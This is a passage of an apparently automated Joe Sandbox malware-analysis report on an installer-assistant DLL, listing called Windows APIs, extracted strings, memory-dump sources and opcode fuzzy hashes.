                                                          • __EH_prolog.LIBCMT ref: 6C7284B1
                                                            • Part of subcall function 6C72993B: __EH_prolog.LIBCMT ref: 6C729940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 1$`)K$h)K
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C71AEF4
                                                            • Part of subcall function 6C71E622: __EH_prolog.LIBCMT ref: 6C71E627
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $h%K
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C6A0279
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C6A0283
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C6A0290
                                                          Strings
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID: Dt*%
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $J
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C6F6CE5
                                                            • Part of subcall function 6C6CCC2A: __EH_prolog.LIBCMT ref: 6C6CCC2F
                                                            • Part of subcall function 6C6CE6A6: __EH_prolog.LIBCMT ref: 6C6CE6AB
                                                            • Part of subcall function 6C6F6A0E: __EH_prolog.LIBCMT ref: 6C6F6A13
                                                            • Part of subcall function 6C6F6837: __EH_prolog.LIBCMT ref: 6C6F683C
                                                            • Part of subcall function 6C6FA143: __EH_prolog.LIBCMT ref: 6C6FA148
                                                            • Part of subcall function 6C6FA143: ctype.LIBCPMT ref: 6C6FA16C
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog$ctype
                                                          • String ID:
                                                          • API String ID: 1039218491-3916222277
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3J$`/J$`1J$p0J
                                                          • API String ID: 0-2826663437
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: W
                                                          • API String ID: 3519838083-655174618
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,6C69F235,?,?,?,?), ref: 6C69F19F
                                                          • TerminateProcess.KERNEL32(00000000,?,6C69F235,?,?,?,?), ref: 6C69F1A6
                                                          • ExitProcess.KERNEL32 ref: 6C69F1B8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C71489B
                                                            • Part of subcall function 6C715FC9: __EH_prolog.LIBCMT ref: 6C715FCE
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @ K
                                                          • API String ID: 3519838083-4216449128
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: x=J
                                                          • API String ID: 3519838083-1497497802
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C6978B0
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C6980D3
                                                            • Part of subcall function 6C699379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C6980BC,00000000,?,?,?,6C6980BC,?,6C6C554C), ref: 6C6993D9
                                                          Similarity
                                                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                                          • String ID:
                                                          • API String ID: 915016180-0
                                                          APIs
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @4J$DsL
                                                          • API String ID: 0-2004129199
                                                          APIs
                                                          Similarity
                                                          • API ID: __aullrem
                                                          • String ID:
                                                          • API String ID: 3758378126-0
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: xUyl
                                                          • API String ID: 0-1598117112
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                                          • Instruction ID: af8ecf7bdcc11d790e8fc7d6f9f8084b833978b86093cf98406b374fa17ef74e
                                                          • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                                          • Instruction Fuzzy Hash: D4727CB26042268FD748CF28C590258FBE1FB89314B5A56BDD85ADB743DB30E895CBC0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                          • Instruction ID: 1856521b20b1d716a9b8be6d146c9f11b36c2a0dcb931f9cb500ce37ada4d010
                                                          • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                          • Instruction Fuzzy Hash: BC6225B1A083458FC714CF19C68052AFBF1BFC8754FA48A2EE89987715DB70E855CB92
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                                          • Instruction ID: 5628dad83768fbd18d9bffda852195eee83b98348e80eabefbe2cf5be6843a27
                                                          • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                                          • Instruction Fuzzy Hash: C742BE71614B058FD328CF29C9847AAB3F2FB84314F444A2EE896C7B91EB74E559CB41
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                          • Instruction ID: b78b3b2891d9e04a802bbfeb76b776778f25a09c9585ddaa2b8af7d4116e8068
                                                          • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                          • Instruction Fuzzy Hash: 9402F773A483514BD718CF198D80219BBE3FBC0380F9A4A2DF89547796DFB09966C791
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                          • Instruction ID: bb7aa9a6091ebbecdc0c709afa840adda423d126b133a1d7b06250851c553513
                                                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                          • Instruction Fuzzy Hash: BC023A32A483118BC319CF2CC580359BBF2FBC4345F594B2EE49697A96DB709875DB82
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                                          • Instruction ID: 7b1393eaaa8b7623af32f5dee2fe46be09a49bb5a5475fca51741ef09b948714
                                                          • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                                                          • Instruction Fuzzy Hash: 0112F270604B518FC328CF2EC194626FBF2BF85304F588A6ED1D687A91DB39E458CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                                          • Instruction ID: c4dea27fe9a1eb3773a90cdf36a834aa6ba72d55f2992c80bbcd97d239372bc8
                                                          • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                                          • Instruction Fuzzy Hash: F7E1EE71604B008BE724CF28D5A03AAB7E2FBC4314F548A3DC596C7B81DB75A50ACB81
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                                          • Instruction ID: 299150840578416b0df14664d3c5f8f11637874386b9e29c93baee775e09058c
                                                          • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                                          • Instruction Fuzzy Hash: 5FF1E2706087558FC328CF2DC490226FBE2BF89304F584A6ED1D6CBA92D739E564CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                                          • Instruction ID: 66e0f9fc1f318617c288b50b5b3b7e1e0705d20b89eb252e37cb6509a6fe9c7f
                                                          • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                                          • Instruction Fuzzy Hash: FEF1F1705087618FC328DF29C59036AFBF1BF89305F588A2ED1D68BA82D739E165CB51
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                                          • Instruction ID: 7990acec95d3190195a8345b012727a153ee9036fcdc5812d6708a6b269f1c57
                                                          • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                                          • Instruction Fuzzy Hash: 44C1D371604B068BE328CF29C5906AAB7E2FBC4314F14CA3DC1A6C7B46D670F595CB80
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                                          • Instruction ID: 41e47a6025aa1bc13e49b086712e8bee21b2329f3b0df809085d219be3462ced
                                                          • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                                          • Instruction Fuzzy Hash: 2BE1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B423DDA650B392D734A942DB94
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                          • Instruction ID: be1f870ed607ec848ef0654fd17f520a67960211bf50d386546f4b0b79d064bf
                                                          • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                                          • Instruction Fuzzy Hash: 59C1B4352047418BC719CF39D1A46A7BFE2EFDA314F148A6DC4CA8BB56DA30A40DCB55
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                                          • Instruction ID: 57dd05e2434fede8c3774710c9a804ed30a2925ebb49f362fb8e2622d5fee88b
                                                          • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                                          • Instruction Fuzzy Hash: CCB16E71A012448FC381CF29C984254BBA2FF8523CB7996AEC4948F647E337E847CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                                          • Instruction ID: e643198ee507c642ccb1337afaa8b7c5e2ce417813a3e7da78f9e22980069c2e
                                                          • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                                          • Instruction Fuzzy Hash: 38D1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                                          • Instruction ID: 168415902345b37c4d3b3a33c66608de0969e0bc9c264845d84601a780b78d91
                                                          • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                                          • Instruction Fuzzy Hash: 32B1D131305B194BD325DE39CA94BEAB7E1BF85308F04552DC99E87782DF30B9098799
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                                          • Instruction ID: c765e21bd58bcecf8ac6286a8755e445779cfb3f205a20794fffbfcfe85a5599
                                                          • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                                          • Instruction Fuzzy Hash: 516141B23082158FD309CFA9E680A96B3E5EB99321B1686BFD105CF361E771DC45DB18
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                          • Instruction ID: 6477f1efd4e274a440e8a8b2e509e9707f30ea9637318414762d8ee5d7cf8130
                                                          • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                          • Instruction Fuzzy Hash: 41916F7681871A8FD314CF18D88025AB7E0FB88318F49067DED9997342D735EA55CBC5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                          • Instruction ID: a2a743a00b47f45e1356c9bb135d091949cd578721ef132ebf804a78cc2ccf73
                                                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                          • Instruction Fuzzy Hash: 0351AE72F056099BDB08CE98DD916EDBBF2EB8C308F24816AD015E7781DB749A42DB44
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction ID: cc0573bd6910936875c10bcd644a916bc8598f02c4bcbc71f7d0762fb1d9fc08
                                                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction Fuzzy Hash: 6B3114277A940203C70CC93BCC1679F92536BD822A70ECB3A6805DAF55D52CC8124548
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                          • Instruction ID: 7390e38bf79f03bf001207945c81b3a9086c962b97f3b75ba8dbd623def5c065
                                                          • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                          • Instruction Fuzzy Hash: EB310873904A094FF341C52A8B84356F223DBC2379F6AC775D96687EFDCA7198478181
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                          • Instruction ID: 77075ed5f8a9b7072dd6ccb44fd8e2c96570263dd48b99e36e9a6b88ebefa808
                                                          • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                          • Instruction Fuzzy Hash: 4F41ADB29047068BD704CF19C89066AB3E4FF88318F454A3DED5AA7381E730FA25CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                          • Instruction ID: f0dd3165d611de35c9eff1de2dfc9741e1b558e0554152da38ed44da78bc81af
                                                          • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                          • Instruction Fuzzy Hash: 7E2148B1A087E707E720DE7ECCD037577D29BC2305F094279DAA08FA87D17984A2E664
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C6C8000, based on PE: true
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                          • Instruction ID: ab37b51902b35f5410cbd279526d84e9e1a66bb83d894b013bf2238ac57aff3a
                                                          • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                          • Instruction Fuzzy Hash: 3021257251453547C301DE2EE988677B7E1FFC4329F678A3ADD928B981C624D440CAA0
                                                          Memory Dump Source
